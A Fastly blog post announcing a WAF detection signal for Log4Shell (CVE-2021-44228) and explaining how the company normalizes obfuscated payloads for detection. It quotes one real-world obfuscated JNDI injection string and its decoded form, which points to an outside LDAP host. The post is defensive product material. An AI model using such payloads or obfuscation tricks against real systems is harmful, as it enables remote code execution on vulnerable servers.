Back to blog

Follow and Subscribe

Log4j JNDI Attack Signal Now Available

Daniel Corbett

Staff Product Manager , Fastly

Background

In December of 2021 the industry was swept by CVE-2021-44228, commonly referred to as Log4Shell. Due to the widespread use of the Log4j library, it left a wide range of software vulnerable. To make matters worse, because this attack affected applications that interacted with logs, it meant that even services that an attacker may not have direct access to could be vulnerable if one of the payloads went through your logging pipeline.

Our Customer Security Operations Center (CSOC) and Security Research teams led a joint effort to quickly deploy a virtual patch for all of our customers. We established internal incident response teams and had around-the-clock monitoring to ensure our customers went unaffected by this critical vulnerability. After a few days, we published some of our data and insights around the various Log4Shell attacks. While monitoring, we were seeing the payload variants morph as evasion techniques were developed by attackers looking to avoid being detected by common WAF patterns.

Extending SmartParse

While all of our attack and anomaly signals leverage our SmartParse technology, we sometimes  implement regex-based virtual patches when an immediate response is required as this allows us to get the patch out to our customers within minutes. However, with the sheer number of variants that were being created, we knew that there was a better way to detect these attacks by leveraging the power of SmartParse.

Our engineers got to work behind the scenes and developed a method that extends SmartParse and allows taking a complex Log4Shell payload and distilling it down into its most basic form. To show you an example, let’s take one of the complex payloads from the wild:

${${uPBeLd:JghU:kyH:C:TURit:-j}${odX:t:STGD:UaqOvq:wANmU:-n}${mgSejH:tpr:zWlb:-d}${ohw:Yyz:OuptUo:gTKe:BFxGG:-i}${fGX:L:KhSyJ:-:}${E:o:wsyhug:LGVMcx:-l}${Prz:-d}${d:PeH:OmFo:GId:-a}${NLsTHo:-p}${uwF:eszIV:QSvP:-:}${JF:l:U:-/}${AyEC:rOLocm:-}/site.local/test}

With SmartParse we are able to translate this into its most basic form:

${jndi:ldap://site.local/test}

Advanced Log4Shell detection and protection

Leveraging SmartParse provides advanced and precise detection with minimal-to-no false positives and without managing and relying on an ever-expansive regex pattern.

We introduced this capability as a new attack signal (LOG4J-JNDI), which we initially launched within our Fastly Security Labs program. After putting the attack signal through several months of observation, we are officially announcing its general availability for all customers. Not only does it offer improved detection over regex-based matching, but with attack signals it also allows you to build and create rules at an organization or corp level, quickly implementing a response policy across your global organization.

Next steps

If you are a customer, you can log into the Next-Gen WAF console and should begin seeing the new LOG4J-JNDI attack signal within your requests feed right away. By default, it’s enabled with threshold-based blocking, which you can adjust to your comfort levels or implement instant blocking as necessary. 

If you are reading this and are either not using a WAF or are using a legacy WAF that is relying on regex pattern matching for detecting Log4Shell or OWASP injection attacks, we’d be happy to give you a demo of the Fastly Next-Gen WAF (powered by Signal Sciences) and show you the alternative to the cumbersome management and false positives that come with legacy WAFs. Reach out to our security experts for more information.